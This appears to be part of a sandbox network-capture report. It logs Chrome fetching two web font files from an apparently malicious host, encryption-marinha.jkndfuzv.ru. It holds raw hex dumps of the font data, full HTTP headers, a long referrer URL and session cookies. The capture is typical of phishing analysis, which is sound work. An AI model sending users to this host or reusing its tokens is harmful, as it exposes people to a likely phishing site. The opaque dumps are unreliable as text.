                                                                  2025-03-14 11:31:00 UTC1369INData Raw: be 83 dd 43 d6 31 ba 15 81 fb 17 de df 75 68 4f ec 7e ab 07 bd e9 34 a9 d7 8a d4 77 27 a0 0e f7 9d 96 ee 5c ef b4 cb 85 21 1e 96 9d a0 a3 b1 c2 7d 45 9d 56 20 61 10 ab 5e 8e af b7 44 c1 41 79 72 28 b2 40 92 a6 76 40 d7 e9 9b 4e 17 70 c3 eb 07 ce b7 44 c7 5b c7 63 f9 4a fd d8 4e 56 2f cf af ee d8 24 78 49 15 c6 14 f7 ab 2c a4 75 fe c9 c2 66 1c d6 24 71 d3 2d 29 99 d0 52 63 a2 e2 cd b4 65 85 a7 0e 36 57 41 36 56 58 30 d6 23 83 e3 70 94 17 66 1c c2 45 aa ae cb b4 7a ea 60 12 7c b4 a5 f8 88 b5 1e 5e c2 f4 84 11 6c b3 6a 2f 19 20 76 93 d4 30 8c a0 43 60 5a 02 b6 86 06 43 15 03 f8 e9 de 72 8e 3a 34 91 e2 f4 87 5f a5 aa 47 88 20 c9 fa fb ce 20 2b 8c 56 d2 ed aa 25 a8 23 24 28 3a a4 17 c2 5e 60 66 2a 8e 73 a7 de 62 48 89 0f 92 c8 10 e9 ad 88 1a eb f2 72 14 e7 b9
                                                                  Data Ascii: C1uhO~4w'\!}EV a^DAyr(@v@NpD[cJNV/$xI,uf$q-)Rce6WA6VX0#pfEz`|^lj/ v0C`ZCr:4_G +V%#$(:^`f*sbHr
                                                                  2025-03-14 11:31:00 UTC1369INData Raw: 3d 06 0a 28 a4 49 6d a6 6f 46 1d 78 2e 47 5c 51 cf 7c ea d0 49 1b 79 95 1a 90 09 07 ff e7 e0 5d 83 d3 28 88 e9 61 21 f3 ca 66 a2 92 b8 04 af ef 77 01 2a 09 ff 91 f0 69 77 23 61 21 25 46 28 08 a1 1a b9 32 ee a4 7a 2c 43 f1 5d 0f d7 d9 65 89 90 f3 df f1 15 f0 d2 09 5d e7 95 37 00 18 28 22 e9 a2 1e b9 c0 9b ab 68 a3 79 74 d9 52 b7 93 7a dc 8b 03 36 d0 90 31 30 a2 22 39 30 0b e9 af c4 ac ee 1a a5 27 78 e5 94 89 1f 92 35 2f d0 e1 36 92 dc 13 cf 16 14 2d f4 74 a5 e6 a9 57 17 69 9d 9f 61 97 5b a0 ea 8a dd 0a 65 cc b0 71 0d 44 47 a3 1c 7c 10 58 24 97 38 21 0c 62 5b 68 70 c9 54 52 48 b1 b4 62 11 48 69 de 26 c2 4b bb 1b 92 67 61 05 df cc 2e 5d fc b1 d9 57 bf 1d 61 25 09 cc c4 e7 b3 02 52 4f 2e 36 c9 82 17 10 4f b8 dd ab 21 07 59 30 8a 5a 7d 78 6c a5 b8 4d f9 3c d6
                                                                  Data Ascii: =(ImoFx.G\Q|Iy](a!fw*iw#a!%F(2z,C]e]7("hytRz610"90'x5/6-tWia[eqDG|X$8!b[hpTRHbHi&Kga.]Wa%RO.6O!Y0Z}xlM<
                                                                  2025-03-14 11:31:00 UTC1369INData Raw: e3 57 66 17 81 f8 91 c4 6a 08 1e a1 73 a2 b3 0d 59 7d 44 8b f1 ba 4b f8 4d 02 ea 4b 96 f7 6d 42 bd d0 f6 0b 06 34 25 52 bf 52 4c 70 57 bf 97 33 c0 a8 71 9a 82 4d 81 d9 7c bc f7 d8 5f 66 46 0a 04 a5 9f 95 0f 3d fc 2f 17 3f 5e 43 fd 6c 6d e7 27 06 d3 df 98 97 6a 86 dc 2e 0c ba 71 ba ba 58 36 2e ce 5f 11 69 c0 a3 ae 38 d2 24 16 b8 20 50 cc fd 01 0f eb cb 42 75 0d 29 de 40 02 76 62 ac 0d d6 cc b6 42 3e f2 ed f1 93 3b 5f aa 81 90 71 ec ca ab 8a 73 b5 c4 68 3f 46 e1 c8 59 5d c2 3d da bf f9 eb 22 81 08 df 70 3e a9 f4 1e fe de 91 8e df 17 6f db e8 29 45 d2 10 bf 4e 8c 3d 28 54 f9 9c 6a 56 2d d4 f3 f9 8d 6f bb b1 5d 75 37 03 67 77 4b 0b 12 c2 6e 9b 97 47 5d ba be c7 ca 44 70 e6 80 2c 4f 95 71 9e 10 ea e0 14 1e ce 65 50 e5 34 a9 3e d6 97 ef 56 5f 47 dc fc 15 c7 4e
                                                                  Data Ascii: WfjsY}DKMKmB4%RRLpW3qM|_fF=/?^Clm'j.qX6._i8$ PBu)@vbB>;_qsh?FY]="p>o)EN=(TjV-o]u7gwKnG]Dp,OqeP4>V_GN


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  18192.168.2.449747104.21.43.1754435628C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-03-14 11:30:59 UTC1411OUTGET /GDSherpa-bold.woff HTTP/1.1
                                                                  Host: encryption-marinha.jkndfuzv.ru
                                                                  Connection: keep-alive
                                                                  Origin: https://encryption-marinha.jkndfuzv.ru
                                                                  sec-ch-ua-platform: "Windows"
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                  sec-ch-ua-mobile: ?0
                                                                  Accept: */*
                                                                  Sec-Fetch-Site: same-origin
                                                                  Sec-Fetch-Mode: cors
                                                                  Sec-Fetch-Dest: font
                                                                  Referer: https://encryption-marinha.jkndfuzv.ru/tqrmmkqnkybhgrcpajlvlmkvressy5l3xb609h7xeqsb767nl?YTUSIOUTJWFKEHXUXRYQVBSNX
                                                                  Accept-Encoding: gzip, deflate, br, zstd
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Cookie: XSRF-TOKEN=eyJpdiI6IkZyZmxmV1dGTDVYS0xEUnVGYmpibmc9PSIsInZhbHVlIjoialhaNzhMdlBEYW91OHBKb2NoWXJlZ2ZXbXY2RW1DN3IxMDJhUHZIalk4dG8wVVpVc3BOL1AwMGZCdkFwV00rNUVCWmJvTzdJRXd2dVZvMzZtSjlQUnJUcUxlNHpVZUdRaDM4d3picnd1VldPYnNiY0wxYzY5ZDdrVExzZFBoSDMiLCJtYWMiOiI3ZjdmZWUyYzQ1Y2JiMzQ2N2I0YzQ0N2NlNzE0NmJjZTYyN2U0ZWM0NzQzNTFjZjYxMWNkMzc0MzNmMjMwMWM0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkJkNDE5K3ZRZFFNd01uMmFseXc5b3c9PSIsInZhbHVlIjoiQllDbm5YV0JrdE5ZU1c5eitnTTg2dEd4Y3JEc1lXakhkQWF0TFVCS01EczlpTzZoOVJHRlBmN3c5bUxOYXZMd09kUjZEZXpBZFYxNGpOZDRaSWU3eHA3WTRjUm1zZlAvaEtGdjZHcmFDdFk3S01lV01VMVVCZ3JZRS9CVitMMFYiLCJtYWMiOiJkOGMxZDY5MzczN2Q0OWI2NTgyYjMyNTE1MmMzMmM3ZTk1ZWUyNjBlYTA0OWU2NTUxYTMyNDNkZWMwYjJjNTFiIiwidGFnIjoiIn0%3D
                                                                  2025-03-14 11:31:00 UTC1154INHTTP/1.1 200 OK
                                                                  Date: Fri, 14 Mar 2025 11:31:00 GMT
                                                                  Content-Type: font/woff
                                                                  Content-Length: 35970
                                                                  Connection: close
                                                                  Content-Disposition: inline; filename="GDSherpa-bold.woff"
                                                                  Last-Modified: Fri, 14 Mar 2025 11:31:00 GMT
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SyfpQyApOQvsYA9mR70UiFl2HYlVARINy94Edw52N0Sk%2F0GUhq43eGlT2%2F0pUtf2sgAayiTC%2FE6DjSBKlQatx5IwOuIJabG%2FthtE5TB50oLgiMrdx8DcwIE%2FeHEj"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Vary: Accept-Encoding
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=5633&min_rtt=5451&rtt_var=1832&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2826&recv_bytes=2318&delivery_rate=431776&cwnd=251&unsent_bytes=0&cid=8e55246c340d2fe6&ts=159&x=0"
                                                                  Cache-Control: max-age=14400
                                                                  CF-Cache-Status: MISS
                                                                  Accept-Ranges: bytes
                                                                  Server: cloudflare
                                                                  CF-RAY: 92037134a909dc28-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1652&min_rtt=1636&rtt_var=645&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2825&recv_bytes=1983&delivery_rate=1655328&cwnd=214&unsent_bytes=0&cid=9c2c476a0180f911&ts=581&x=0"
                                                                  2025-03-14 11:31:00 UTC215INData Raw: 77 4f 46 46 00 01 00 00 00 00 8c 82 00 11 00 00 00 01 24 20 00 01 00 00 00 00 8b 5c 00 00 01 26 00 00 02 93 00 00 00 00 00 00 00 00 44 53 49 47 00 00 8b 54 00 00 00 08 00 00 00 08 00 00 00 01 47 50 4f 53 00 00 01 80 00 00 17 df 00 00 4e b6 ed 42 8f b9 47 53 55 42 00 00 19 60 00 00 02 ad 00 00 04 96 8c 33 79 b9 4f 53 2f 32 00 00 1c 10 00 00 00 46 00 00 00 60 69 c3 7b 5b 63 6d 61 70 00 00 1c 58 00 00 05 1a 00 00 07 3c 97 3f 2b 12 63 76 74 20 00 00 84 dc 00 00 00 2f 00 00 00 3c 29 81 01 c0 66 70 67 6d 00 00 85 0c 00 00 05 c1 00 00 0b e2 3f ae 1b 9f 67 61 73 70 00 00 84 d4 00 00 00 08 00 00 00 08 00 00 00 10 67 6c 79 66 00 00 21 74 00 00 52
                                                                  Data Ascii: wOFF$ \&DSIGTGPOSNBGSUB`3yOS/2F`i{[cmapX<?+cvt /<)fpgm?gaspglyf!tR
                                                                  2025-03-14 11:31:00 UTC1369INData Raw: 61 00 00 9d a4 24 e0 b2 69 68 65 61 64 00 00 73 d8 00 00 00 33 00 00 00 36 1b 16 7d b8 68 68 65 61 00 00 74 0c 00 00 00 21 00 00 00 24 10 f8 09 15 68 6d 74 78 00 00 74 30 00 00 03 80 00 00 07 78 3f 73 90 23 6c 6f 63 61 00 00 77 b0 00 00 03 a8 00 00 03 be 4c 43 25 1c 6d 61 78 70 00 00 7b 58 00 00 00 20 00 00 00 20 03 35 0c fc 6e 61 6d 65 00 00 7b 78 00 00 02 c8 00 00 06 03 d7 eb b7 a5 70 6f 73 74 00 00 7e 40 00 00 06 94 00 00 0b fb 31 2b f3 2c 70 72 65 70 00 00 8a d0 00 00 00 81 00 00 00 8d 19 50 02 10 78 da ed 5c 0d 74 55 d5 95 de 3b 79 dc bc f7 08 21 be 89 21 09 10 52 8d 34 a2 22 28 08 22 2a 22 a2 55 e4 af d6 56 b4 5d 33 ae a9 e3 72 a8 cb 35 63 07 ac 1d 6a f9 b5 2e 01 87 5f e5 37 55 b0 94 89 48 01 15 31 4d 53 45 08 10 10 30 62 a0 11 62 26 86 bf 18 92 f0
                                                                  Data Ascii: a$iheads36}hheat!$hmtxt0x?s#locawLC%maxp{X 5name{xpost~@1+,prepPx\tU;y!!R4"("*"UV]3r5cj._7UH1MSE0bb&
                                                                  2025-03-14 11:31:00 UTC1369INData Raw: f9 cb c5 67 64 82 82 4c 50 90 0a 9e d5 80 0a 8f d8 d0 5a 50 93 87 f6 4d 78 76 33 28 d9 89 5f e1 9f 58 6f 00 fa 62 4a c9 c6 58 02 4d 49 b1 34 05 52 c2 bd b9 98 e3 3c fc ce 87 9e 2d 14 49 25 f2 62 b4 69 0b 36 ad 37 19 98 93 2d bf 61 4b ab 41 fc c6 66 13 13 66 08 d9 03 5b 3e f6 02 78 70 93 e7 06 70 79 2c e9 1b 98 8d 1e 2b 80 b1 32 30 56 a2 d8 6d 2e 7e d7 a2 2d 4f c6 f2 82 f2 44 50 9d 06 a9 e5 63 d4 bd 88 09 07 84 ea 4a 19 69 2e 5a b5 fe 6a dd 35 2d 3f 04 4a 6a 40 49 35 74 b7 41 46 29 12 bd c9 14 8a 0a a1 a3 af 89 2c 72 78 2a 66 f9 14 24 f8 0b fc 3e 4d 03 20 89 d7 c0 39 03 f4 32 bd 0e bd d2 fd d7 c9 f1 90 1c 2b e4 58 85 11 d2 31 b3 9e b0 7b 4d 51 81 50 b3 0d 52 6b 90 96 17 d1 52 41 39 68 c9 87 e7 2a 80 3e 4f 6f 29 a1 4b c0 f5 f5 f0 1b 53 d1 02 af a9 6a f1 5c
                                                                  Data Ascii: gdLPZPMxv3(_XobJXMI4R<-I%bi67-aKAff[>xppy,+20Vm.~-ODPcJi.Zj5-?Jj@I5tAF),rx*f$>M 92+X1{MQPRkRA9h*>Oo)KSj\
                                                                  2025-03-14 11:31:00 UTC1369INData Raw: 4a da ea e0 d7 ab b4 cd b8 2a dd be 76 a5 ab 7d 10 9e 36 57 41 be e5 b5 03 89 35 fb d4 09 55 10 ad d2 b5 57 b9 54 c3 df 59 b5 9b 19 73 89 97 99 16 63 45 bc aa 8b 94 2f 7a 05 b8 bf 7a 54 0d 44 9e 56 25 f2 ff dc b6 75 59 0b 2e 83 37 3d a1 0e 62 3f e4 54 e6 83 ac 4a a4 19 ed 31 c9 d9 9d 7c b7 93 6c 36 c2 ca e0 c5 be c5 dc 73 a9 0d 2a 97 f2 e9 79 da 88 f3 dd ba 92 14 89 af 97 b6 35 ea 18 b4 a0 16 1e a9 c4 5e 7f a7 25 ce 93 87 70 b8 5a 56 e8 5e c5 be 28 a6 54 ef fb 7f 09 7e 73 df a7 fe a3 a5 5a 3d a3 46 c9 3a 6b 95 e9 bd cd d8 83 df 1a 55 aa 8e 22 63 ca 56 15 6a 9d f3 cc 28 3b 5b 82 07 b8 2f e6 3a da 02 0d ac a7 4b e1 81 1a 9c f7 61 71 d6 bb 52 dd fe 6e d8 5b 3d 8f b5 a6 14 e3 dc 0e de e6 73 75 9c 12 cd 35 7d c9 3c 9b 74 46 ec ca 92 6d ea c4 d3 9a 19 70 8c 3c
                                                                  Data Ascii: J*v}6WA5UWTYscE/zzTDV%uY.7=b?TJ1|l6s*y5^%pZV^(T~sZ=F:kU"cVj(;[/:KaqRn[=su5}<tFmp<
                                                                  2025-03-14 11:31:00 UTC1369INData Raw: 26 d3 ef 5b 11 3c e2 9a 86 f9 46 08 b3 69 51 5b a2 67 3b 98 79 83 3d 92 99 71 80 27 bb e1 39 ce 45 95 79 00 fd d6 20 bb 9e 2d 5e bd d6 7e 16 fb 48 48 eb 0b 58 d2 34 58 fe 1e 44 fa 0f 9c 67 7a a1 55 e2 09 ac aa d6 d6 2f f5 e2 57 5d 47 89 da 5e ac f2 60 37 11 32 76 a9 10 b5 b7 d1 75 43 63 84 95 74 8f ab d2 69 c3 f9 36 d7 95 9d 7d 3d d8 69 85 64 b8 fa 78 c2 d7 2f 41 5d 01 bc c3 1a 77 14 0e ab 36 aa 2c cd 6a fd 1a af d9 8e ad 90 92 f3 6e 4d 15 da 39 5c 74 0b 6f d3 5e d4 3e 3b 45 3c e8 65 af e6 76 b0 82 61 38 6b c4 a5 ed 46 6d 68 c5 6d d7 64 d1 b4 53 f4 b2 36 aa 65 06 6d 5b b3 bc c2 17 d2 bf 41 f4 d2 d3 c9 dc 9a 5a 7d 8d 95 3b 37 69 88 90 93 46 91 5e eb fb 54 f8 f5 70 ef 13 72 ad ef 9d b1 6c 34 e8 ba 57 d1 d1 7b 38 f4 f2 4b fe bc db d1 9c e4 c8 6f eb 5d 95 d9
                                                                  Data Ascii: &[<FiQ[g;y=q'9Ey -^~HHX4XDgzU/W]G^`72vuCcti6}=idx/A]w6,jnM9\to^>;E<eva8kFmhmdS6em[AZ};7iF^Tprl4W{8Ko]
                                                                  2025-03-14 11:31:00 UTC1369INData Raw: 1e d1 09 8c 06 3d 36 90 e0 89 04 77 5a a0 29 be c7 01 b2 ae ec 19 98 db 38 17 8c 8f 02 13 30 c7 1f c8 3c 6d f8 a1 c0 dd 1d c0 8f 2c 78 c0 81 49 0e fc ad b6 db 51 2d 07 e8 fb 74 9f ec b7 03 ee a2 ef c9 de 15 56 aa 7d 77 02 7c c6 1d e8 79 87 40 7f ba 04 b6 3b 11 d0 03 b1 f4 bb c8 5a b2 2d 9f dc 0d f1 43 ff ff 25 9f 44 95 51 80 6b c8 fe 1a dd de 7a ba ce af a4 cb 71 1c 43 ee ef 5a ed d8 fb 1d 39 de 61 e1 cd 92 bf 0c d0 11 b2 37 6c ee 25 89 0f e3 24 17 60 c9 05 52 e4 6d 60 0a 28 e8 86 76 9d 35 a5 58 90 0a f8 0e 28 ed 81 27 d2 00 a9 d0 c2 74 e8 5b 86 fc 37 ad 9e 80 ef 42 93 7a c1 7a 7b 03 0c 68 57 1f 3c 95 85 67 58 32 b0 54 cc b5 2f 66 a5 df 0f dd 2b de eb 52 58 cf 48 b4 8e 02 8f 52 20 c5 07 70 fc 67 fa 29 f0 3e 41 4f e3 fc 97 80 4b e9 19 9a 89 31 66 d1 1c e0
                                                                  Data Ascii: =6wZ)80<m,xIQ-tV}w|y@;Z-C%DQkzqCZ9a7l%$`Rm`(v5X('t[7Bzz{hW<gX2T/f+RXHR pg)>AOK1f
                                                                  2025-03-14 11:31:00 UTC1369INData Raw: 1e 88 cb 70 1e 8a 5b b4 91 7a f1 f6 84 97 e2 ae 91 57 62 e7 35 6f c5 ce 7b 3e 88 9d 26 fd 92 a5 83 6f e2 e7 bb 89 20 c5 78 4c 2c 79 26 ce 64 eb 35 6d bb 8c 6a b5 81 ae 5a 4c 95 dd f8 5b bf 71 47 f1 77 36 5e d5 2e 9e de b2 4f ed d1 63 6a b4 fd 60 53 6d ed 23 53 fd 9f 4a db b2 ee 2b 1a a3 2c d7 3e 53 96 5b f1 6a 9b 32 f4 1a 87 02 d3 d5 aa 37 92 fa bf 74 81 bb 45 00 00 00 78 da 63 60 66 99 c6 1c c4 c0 ca c0 c2 6a cc 72 86 81 81 61 26 84 66 02 e1 08 06 54 c0 8e cc 71 73 74 f3 07 52 0a bf 59 d8 72 fe e5 30 9c e0 d8 c7 e4 a5 c0 c0 30 19 24 c7 fc 82 2d 07 24 c7 c0 0c 00 39 34 0c f8 00 00 78 da 8d 95 09 94 4e 65 1c c6 7f cf 9d 45 a1 6c 61 b2 5c 77 3e 4c a4 84 8c ad 45 cb 0c 2a 29 a4 42 34 4a cb 90 f6 4c 08 63 8b 12 c3 60 b4 20 23 86 66 d0 31 46 26 46 06 43 b6 2c
                                                                  Data Ascii: p[zWb5o{>&o xL,y&d5mjZL[qGw6^.Ocj`Sm#SJ+,>S[j27tExc`fjra&fTqstRYr00$-$94xNeEla\w>LE*)B4JLc` #f1F&FC,
                                                                  2025-03-14 11:31:00 UTC1369INData Raw: db 4c fb b7 2b d9 6b b4 2e d0 5b ea 61 fc 6e 33 2a 9b 6a 9f 91 fb a1 76 29 dd e8 3d 68 7f ff b0 8e a8 c0 c8 5e 64 df de 60 4c cd 32 ee f7 2b 5f 4b b5 dd 4e 9f 44 23 7b ba ed 44 1b d7 43 4b fc ab 97 35 b9 b4 7f 25 9d dc a2 03 c6 dd 5c ed d6 db 76 5a 8d 26 9f 83 d6 d3 24 eb f0 48 ed b5 2c e8 6a 89 d0 dd 72 a0 8c ff be a5 ec 63 19 50 42 fd 24 96 ab 97 79 ac 5f b9 df e2 d4 d3 3c 77 f7 ef a7 1d ba 82 00 00 78 da d4 bd 77 60 d3 c7 d9 38 7e f7 19 92 bc 2d cb f2 5e b2 6c cb 03 4f 59 96 b7 85 59 5e 18 4f 8c 07 78 63 63 1b 63 f6 0e 7b 86 04 08 64 11 c8 24 94 24 84 52 56 48 02 21 4d 9a 84 b6 d0 bc 0d 6d da a6 49 9a b6 69 4a 1a d2 b7 ed eb 24 2d 58 1f ff 9e bb cf b0 2c 5b 49 fb be df 7f 7e 06 5b d2 e9 b9 fb 3c f7 dc 73 cf ba e7 ee 10 83 0e 22 c4 be c5 be 82 58 a4 46
                                                                  Data Ascii: L+k.[an3*jv)=h^d`L2+_KND#{DCK5%\vZ&$H,jrcPB$y_<wxw`8~-^lOYY^Oxccc{d$$RVH!MmIiJ$-X,[I~[<s"XF
                                                                  2025-03-14 11:31:00 UTC1369INData Raw: 39 83 cb ec 37 98 22 e1 4d a1 46 f8 13 e9 74 26 73 dd fe f6 c8 79 e6 71 e1 f7 c2 16 68 58 e2 4f 6f 78 cb a3 60 5b 80 dc 77 a6 09 ba e4 c3 00 19 7d 59 68 96 d0 10 b8 5c 60 5a 46 4e f0 3b ef f6 fd 4d ac a7 aa a4 f3 15 c6 c0 5d cd 00 52 b8 0c d3 31 00 04 69 6d 3f 3f ad 9f c4 d5 80 14 41 c9 08 88 9d c7 6d 78 31 fc 6b 1b 16 8e dd 16 8e 0d 43 83 cf 71 0d 77 d6 71 d1 77 3f 26 bf 12 4e 5f d3 39 13 61 0b 55 43 63 4a d3 2c 16 5b 86 86 39 75 10 20 86 c9 d8 92 56 47 99 39 c3 82 fd 0c 34 37 12 cd 7e 7c 67 1d fb bb 11 03 91 2b 64 be 3c 0f f3 45 87 4c 28 d9 96 08 2c 2d 71 38 0f 4d 29 12 4f ef 8f 51 64 b8 bf 49 6f 02 c6 86 61 53 d1 61 8b 19 93 7a 92 9c 31 51 29 93 c2 c8 3c ce 32 a7 85 d1 ef d5 d4 7c 0f e3 d3 a7 31 26 ef 84 d1 d3 4b 9f ec 48 4e ee 78 72 a9 f4 ea bf fa 1a
                                                                  Data Ascii: 97"MFt&syqhXOox`[w}Yh\`ZFN;M]R1im??Amx1kCqwqw?&N_9aUCcJ,[9u VG947~|g+d<EL(,-q8M)OQdIoaSaz1Q)<2|1&KHNxr
                                                                  2025-03-14 11:31:00 UTC1369INData Raw: 7a dc 89 fa ff da 75 5a 10 4e d6 d4 9c c4 cc e9 3d ef 55 8f d9 bf 77 4e 38 29 bf c3 f5 b5 63 72 7b 6e ed 83 9f 09 4f fc 19 48 fe de 04 f5 07 d6 17 f5 dd 54 3f 47 01 28 1a c5 a2 42 5b 9e 9e 07 9d 4b d9 81 f8 55 9d 30 b1 11 56 a1 0e 0d 78 55 e0 5b 81 03 43 2c a0 a0 40 04 86 69 44 58 60 74 50 34 54 0d 88 d7 6a dd 80 b1 45 9f 2e 4e 12 96 a2 8f 85 25 19 4e 84 66 00 b8 7b 5c 80 e4 ea f9 a6 e7 c6 14 d6 a5 a6 d6 15 c5 59 53 18 ad 7d 20 39 db 92 36 25 2b 27 09 3c 40 ea fd a5 84 77 e5 a7 d6 17 c6 18 0b eb d2 f3 db c3 ee fc 8c df 95 9b 9c 60 b5 26 24 e7 0a 8f 88 7e 21 f8 9e 42 25 bf 0f 78 39 04 85 a3 e9 b6 a9 81 98 63 40 41 72 4c 99 b7 0a 0c eb 52 b0 b1 30 c3 e3 0e aa 73 c8 24 24 dc 0c 76 38 4c ca 50 22 11 c3 c3 f4 3a 2f 4f 0f 77 37 0d 0a c1 21 6a 90 8a 38 1a d0 cf
                                                                  Data Ascii: zuZN=UwN8)cr{nOHT?G(B[KU0VxU[C,@iDX`tP4TjE.N%Nf{\YS} 96%+'<@w`&$~!B%x9c@ArLR0s$$v8LP":/Ow7!j8


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  19192.168.2.449744104.21.43.1754435628C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-03-14 11:30:59 UTC1415OUTGET /GDSherpa-regular.woff2 HTTP/1.1
                                                                  Host: encryption-marinha.jkndfuzv.ru
                                                                  Connection: keep-alive
                                                                  Origin: https://encryption-marinha.jkndfuzv.ru
                                                                  sec-ch-ua-platform: "Windows"
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                  sec-ch-ua-mobile: ?0
                                                                  Accept: */*
                                                                  Sec-Fetch-Site: same-origin
                                                                  Sec-Fetch-Mode: cors
                                                                  Sec-Fetch-Dest: font
                                                                  Referer: https://encryption-marinha.jkndfuzv.ru/tqrmmkqnkybhgrcpajlvlmkvressy5l3xb609h7xeqsb767nl?YTUSIOUTJWFKEHXUXRYQVBSNX
                                                                  Accept-Encoding: gzip, deflate, br, zstd
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Cookie: XSRF-TOKEN=eyJpdiI6IkZyZmxmV1dGTDVYS0xEUnVGYmpibmc9PSIsInZhbHVlIjoialhaNzhMdlBEYW91OHBKb2NoWXJlZ2ZXbXY2RW1DN3IxMDJhUHZIalk4dG8wVVpVc3BOL1AwMGZCdkFwV00rNUVCWmJvTzdJRXd2dVZvMzZtSjlQUnJUcUxlNHpVZUdRaDM4d3picnd1VldPYnNiY0wxYzY5ZDdrVExzZFBoSDMiLCJtYWMiOiI3ZjdmZWUyYzQ1Y2JiMzQ2N2I0YzQ0N2NlNzE0NmJjZTYyN2U0ZWM0NzQzNTFjZjYxMWNkMzc0MzNmMjMwMWM0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkJkNDE5K3ZRZFFNd01uMmFseXc5b3c9PSIsInZhbHVlIjoiQllDbm5YV0JrdE5ZU1c5eitnTTg2dEd4Y3JEc1lXakhkQWF0TFVCS01EczlpTzZoOVJHRlBmN3c5bUxOYXZMd09kUjZEZXpBZFYxNGpOZDRaSWU3eHA3WTRjUm1zZlAvaEtGdjZHcmFDdFk3S01lV01VMVVCZ3JZRS9CVitMMFYiLCJtYWMiOiJkOGMxZDY5MzczN2Q0OWI2NTgyYjMyNTE1MmMzMmM3ZTk1ZWUyNjBlYTA0OWU2NTUxYTMyNDNkZWMwYjJjNTFiIiwidGFnIjoiIn0%3D
                                                                  2025-03-14 11:31:00 UTC1153INHTTP/1.1 200 OK
                                                                  Date: Fri, 14 Mar 2025 11:31:00 GMT
                                                                  Content-Type: font/woff2
                                                                  Content-Length: 28584
                                                                  Connection: close
                                                                  Content-Disposition: inline; filename="GDSherpa-regular.woff2"
                                                                  cf-cache-status: MISS
                                                                  Last-Modified: Fri, 14 Mar 2025 11:31:00 GMT
                                                                  Accept-Ranges: bytes
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iCxX2dDj%2B8iVVN2C3r3W22wsPMjK%2BYiWh5KdeFrXMX76zhG1fhlYhBcdFF2RD4U0js6M0TtjZZYl59ZdSyyVhn36MVvzyyJLDiYcEc9u7G5nYD8DmsZznYYGmP5U"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Vary: Accept-Encoding
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4006&min_rtt=4001&rtt_var=1511&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2826&recv_bytes=2325&delivery_rate=703905&cwnd=251&unsent_bytes=0&cid=6d9a595f4988163c&ts=147&x=0"
                                                                  Cache-Control: max-age=14400
                                                                  Server: cloudflare
                                                                  CF-RAY: 92037134ab34236b-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1781&min_rtt=1774&rtt_var=679&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2826&recv_bytes=1987&delivery_rate=1594756&cwnd=179&unsent_bytes=0&cid=c6b8f763e4f004a2&ts=469&x=0"
                                                                  2025-03-14 11:31:00 UTC216INData Raw: 77 4f 46 32 00 01 00 00 00 00 6f a8 00 10 00 00 00 01 36 78 00 00 6f 47 00 01 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 81 bc 3e 1c 89 16 06 60 00 8e 3c 08 3c 09 97 62 11 08 0a 82 c0 68 82 a2 42 01 36 02 24 03 8e 78 0b 87 3e 00 04 20 05 8c 27 07 97 7b 0c 81 0d 5b 78 22 71 04 dd b6 5d c4 a2 0a ca 1b ec 97 68 4a b7 df b3 0a d8 b1 27 dc 0e e2 ce 96 b5 c5 0a 36 ae 32 bb 5b 95 0a ec 05 71 f6 ff ff 7f 7a d2 88 b1 6d 43 77 77 ff 00 08 2a a9 65 55 b0 0a 53 9a a2 10 14 ad 17 8a 9a 11 30 8d c1 53 1a 73 a6 e1 b6 2c ad b0 c2 e4 5c e5 65 96 de 46 b1 26 ef 94 d7 16 8d 6f 55 2a 52 1a 7d 51 f7 43 8e e7 32 b9 54 44 c8 b6 e1 0a d3
                                                                  Data Ascii: wOF2o6xoGB>`<<bhB6$x> '{[x"q]hJ'62[qzmCww*eUS0Ss,\eF&oU*R}QC2TD
